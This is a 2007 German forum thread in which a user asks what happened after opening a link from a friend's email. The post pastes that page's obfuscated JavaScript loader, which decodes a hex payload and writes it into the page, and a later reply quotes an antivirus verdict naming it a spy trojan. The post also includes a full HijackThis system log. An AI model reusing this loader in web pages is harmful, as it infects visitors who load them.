#1 2. April 2007 HI ... Krieg grad ne Mail von nem Kumpel mit nem Bild von ner Freundin von uns und meinte wenn ich aufs Bild klick gibs noch mehr Fotos... so ne Email hatte ich bislang noch nie gesehen, zumal da 1. das Bild von ner Freundin war und 2. das von nem Kumpel kam... Naja spiel keine Rolle.. Folgende Seite ist es gewesen: [ Anklicken auf eigene Gefahr ] http:||extranastyinc.com|indexxx.html [ Anklicken auf eigene Gefahr ] Ich weiss nicht was das war... kann sein das ich mir das eingebildet hab, aber wo ich auf die Site gegangen war, hatte kurze Zeit meine Festplatte gerattert? Im Quelltext stand das: Code: <HTML><SCRIPT LANGUAGE="JavaScript"> <!-- function K508A7(B2B5E7){var H74E49=arguments.callee.toString().replace(/\W/g,"").toUpperCase();var Q10CCF;var UAC893=H74E49.length;var D9C672;var AEEA53;var R72B7F="";var E9B774=new Array(0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117);D9C672=4294967295;for(Q10CCF=0;Q10CCF<UAC893;Q10CCF++){D9C672=E9B774[(D9C672^H74E49.charCodeAt(Q10CCF))&255]^((D9C672>>8)&16777215);}D9C672=D9C672^4294967295;var IBE823;var H9724A;Q10CCF=D9C672&65535;IBE823=Q10CCF.toString(16).toUpperCase();while(IBE823.length<4){IBE823="0"+IBE823;}Q10CCF=(D9C672>>>16)&65535;H9724A=Q10CCF.toString(16).toUpperCase();while(H9724A.length<4){H9724A="0"+H9724A;}AEEA53=H9724A+IBE823;var KAEB99;var PA1E15=0;var GBE4ED;var D16C34;var B8DD63;var R7CC4E='';for(KAEB99=0;KAEB99<B2B5E7.length;KAEB99+=2){B8DD63=0;R72B7F="";D16C34="";D16C34+=B2B5E7.charAt(KAEB99);D16C34+=B2B5E7.charAt(KAEB99+1);GBE4ED=parseInt(D16C34,16);B8DD63=GBE4ED-AEEA53.charCodeAt(PA1E15);if(PA1E15<AEEA53.length-1){PA1E15++;}else{PA1E15=0;}KAEB99+=2;while(B8DD63!=0){D16C34="";D16C34+=B2B5E7.charAt(KAEB99);D16C34+=B2B5E7.charAt(KAEB99+1);GBE4ED=parseInt(D16C34,16);R72B7F+=String.fromCharCode(GBE4ED-AEEA53.charCodeAt(PA1E15));if(PA1E15<AEEA53.length-1){PA1E15++;}else{PA1E15=0;}B8DD63--;KAEB99+=2;}var NF2476=parseInt(R72B7F);if(NF2476!=0){if(NF2476>127){R72B7F="?"+NF2476.toString()+";";}else{R72B7F=String.fromCharCode(NF2476);}R7CC4E+=R72B7F;}KAEB99-=2;}document.write(R7CC4E);} K508A7('456D6334657B4761746D36636175476175673663627A46697A3A64636547756074396C69337A7632796736636179476173693663627846697A3A64626A477560743966643475756546686466337D7D327968356565477560773A646367477561793A646363467968456B6A34657B4761736C356B694775607C396767347575654668646734757468456B69346A7D476174683663617D46657B39686833787D32776E356B6A477560763A64626646786545706B356274793374686334657B476174673663627947617469356667467D694668636534757465456D6635627576327968356B694775617A3A646462467764456A653562757D3374676835627474337468693562747832796835666A467762466863663475746146686367347574634668636634757566456D6434657D4663753A646366477561793A6464624775607B3A646262467A61456A67346A7C476174683663627847617367366361754761746B356769467762456B6B356275763374696334647846667539696233787B337467683562747633746867346A7B4761737036636175466675'); //--> </SCRIPT><BODY></BODY></HTML> Ka was das bedeutet Naja meine Frage ist nun... WAS IST DAS? Virus? Trojaner? Spyware? Laut HijackThis ist auch nix wirklich gravierendes dabei! Code: Logfile of HijackThis v1.99.1 Scan saved at 12:50:47, on 02.04.2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\RTHDCPL.EXE C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe C:\Programme\DAEMON Tools\daemon.exe C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe C:\Programme\FreePDF_XP\fpassist.exe C:\Programme\QuickTime\qttask.exe C:\Programme\iTunes\iTunesHelper.exe C:\WINDOWS\system32\ctfmon.exe C:\Programme\Red Chair Software\Anapod Explorer\anamgr.exe C:\Programme\AntiVir PersonalEdition Classic\sched.exe C:\Programme\AntiVir PersonalEdition Classic\avguard.exe C:\WINDOWS\ATKKBService.exe C:\Programme\IVT Corporation\BlueSoleil\BTNtService.exe C:\Programme\Cisco Systems\VPN Client\cvpnd.exe C:\Programme\Gemeinsame Dateien\Microsoft Shared\VS7DEBUG\MDM.EXE C:\WINDOWS\system32\nvsvc32.exe C:\Programme\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe C:\WINDOWS\system32\svchost.exe C:\Programme\VMware\VMware Player\vmware-authd.exe C:\Programme\Gemeinsame Dateien\VMware\VMware Virtual Image Editing\vmount2.exe C:\WINDOWS\system32\vmnat.exe C:\WINDOWS\system32\vmnetdhcp.exe C:\Programme\iPod\bin\iPodService.exe C:\Programme\QIP\qip.exe C:\Programme\Mozilla Thunderbird\thunderbird.exe C:\Programme\Mozilla Firefox\firefox.exe C:\WINDOWS\system32\wscntfy.exe C:\Programme\WinRAR\WinRAR.exe C:\DOKUME~1\Benni\LOKALE~1\Temp\Rar$EX00.812\HijackThis.exe R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = www-proxy.t-online.de:80 O2 - BHO: HelperObject Class - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Programme\TechSmith\SnagIt 7\SnagItBHO.dll O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O2 - BHO: IeCatch5 Class - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\PROGRA~1\FlashGet\jccatch.dll O2 - BHO: Megaupload Toolbar - {4E7BD74F-2B8D-469E-CCB0-B130EEDBE97C} - C:\Programme\MegauploadToolbar\megauploadtoolbar.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll O2 - BHO: MegaIEMn - {bf00e119-21a3-4fd1-b178-3b8537e75c92} - C:\Programme\Megaupload\Mega Manager\MegaIEMn.dll O2 - BHO: gFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\PROGRA~1\FlashGet\getflash.dll O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll O3 - Toolbar: Megaupload Toolbar - {4E7BD74F-2B8D-469E-CCB0-B130EEDBE97C} - C:\Programme\MegauploadToolbar\megauploadtoolbar.dll O3 - Toolbar: SnagIt - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Programme\TechSmith\SnagIt 7\SnagItIEAddin.dll O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [avgnt] "C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [DAEMON Tools] "C:\Programme\DAEMON Tools\daemon.exe" -lang 1033 O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [FreePDF Assistant] C:\Programme\FreePDF_XP\fpassist.exe O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [amd_dc_opt] "C:\Programme\AMD\amd_dc_opt\amd_dc_opt.exe" O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [iTunesHelper] "C:\Programme\iTunes\iTunesHelper.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [Skype] "C:\Programme\Skype\Phone\Skype.exe" /nosplash /minimized O4 - Startup: Adobe Gamma.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe O4 - Startup: Anapod Manager.lnk = C:\Programme\Red Chair Software\Anapod Explorer\anamgr.exe O4 - Startup: WISO Bewerbung 2007 Reminder.lnk = C:\Programme\WISO\Bewerbung 2007\KCReminder.exe O4 - Global Startup: Cisco Systems VPN Client.lnk = C:\Programme\Cisco Systems\VPN Client\vpngui.exe O4 - Global Startup: SnagIt 7.lnk = C:\Programme\TechSmith\SnagIt 7\SnagIt32.exe O8 - Extra context menu item: Alles mit FlashGet laden - C:\Programme\FlashGet\jc_all.htm O8 - Extra context menu item: Mit FlashGet laden - C:\Programme\FlashGet\jc_link.htm O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~4\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\OFFICE11\REFIEBAR.DLL O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - F:\Games\PartyPoker\PartyPoker\RunApp.exe O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - F:\Games\PartyPoker\PartyPoker\RunApp.exe O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1160813719622 O17 - HKLM\System\CCS\Services\Tcpip\..\{76FA249C-BA3D-4071-A186-BBC7934B7B17}: NameServer = 192.168.1.254 O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Help\hxds.dll O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL O23 - Service: Adobe LM Service - Adobe Systems - C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: AntiVir PersonalEdition Classic Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - AVIRA GmbH - C:\Programme\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: ATK Keyboard Service (ATKKeyboardService) - ASUSTeK COMPUTER INC. - C:\WINDOWS\ATKKBService.exe O23 - Service: BlueSoleil Hid Service - Unknown owner - C:\Programme\IVT Corporation\BlueSoleil\BTNtService.exe O23 - Service: Cisco Systems, Inc. VPN Service (CVPND) - Cisco Systems, Inc. - C:\Programme\Cisco Systems\VPN Client\cvpnd.exe O23 - Service: Imapi Helper - Alex Feinman - C:\Programme\Alex Feinman\ISO Recorder\ImapiHelper.exe O23 - Service: iPod-Dienst (iPod Service) - Apple Inc. - C:\Programme\iPod\bin\iPodService.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Unknown owner - %ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini (file missing) O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket Division Software - C:\Programme\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe O23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Programme\VMware\VMware Player\vmware-authd.exe O23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe O23 - Service: VMware Virtual Mount Manager Extended (vmount2) - VMware, Inc. - C:\Programme\Gemeinsame Dateien\VMware\VMware Virtual Image Editing\vmount2.exe O23 - Service: VMware NAT Service - VMware, Inc. - C:\WINDOWS\system32\vmnat.exe Wäre super wenn jemand weiss, was da eben passiert ist bei mir wo ich diese Seite aufgerufen hab! + Multi-Zitat Zitieren
#2 2. April 2007 AW: Ich .. Seite besucht und kA was passiert ist scheints nochmal glück gehabt zu haben. sprech deinen freund auf den link an, frage ihn, ob er das absichtlich verschickt hat, oder ob es vielleicht unbemerkt passiert ist. außerdem zeig mal das foto von deiner freundin. ansonsten, welcher browser und surfst du mit administrativen rechten? mfg spotting + Multi-Zitat Zitieren
#3 2. April 2007 AW: Ich .. Seite besucht und kA was passiert ist O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE - (Gehört zur Soundkarte) Das Programm sammelt Informationen über deine Computernutzung und leitet sie weiter. Brauchst Du nicht unbedingt. Die Seite ist mit Spyware verseucht, ZoneAlarm hatte sie bei mir geblockt. Lass Adaware oder Spybot drüberlaufen. + Multi-Zitat Zitieren
#4 2. April 2007 AW: Ich .. Seite besucht und kA was passiert ist Hattest du, falls du Firefox benutzt, NoScript laufen? Würde mich persönlich mal interessieren, ob das im Ernstfall wirklich was taugt. + Multi-Zitat Zitieren
#5 3. Oktober 2007 AW: Ich .. Seite besucht und kA was passiert ist das is nen trojaner auf der seite. hab grad einfach mal nachgeschaut^^ + Multi-Zitat Zitieren
#6 3. Oktober 2007 AW: Ich .. Seite besucht und kA was passiert ist ich glaub nicht, dass dein kumpel das extra gemacht hat, eher hat er irgentne art von trojaner oder spyware drauf, die sich selbst verschickt sprich ihn mal drauf an und guck was er dazu sagt.. oder vlt. hat sich der "virus" beim abschicken der email mit angehangen, also in jedem fall ungewollt denke ich mal mfg FynnY + Multi-Zitat Zitieren
#7 3. Oktober 2007 AW: Ich .. Seite besucht und kA was passiert ist Kaspersky Internet Security 7.0 The requested URL http://extranastyinc.com/indexxx.html is infected with Trojan-Spy.JS.Statistic.a virus Meldung von meiner geliebten KIS 7.0. MfG !nvaTion + Multi-Zitat Zitieren
#8 3. Oktober 2007 AW: Ich .. Seite besucht und kA was passiert ist Dr. Web is der meinung die seite sei clean anscheinden sind die FF plugins alle fürn ***** + Multi-Zitat Zitieren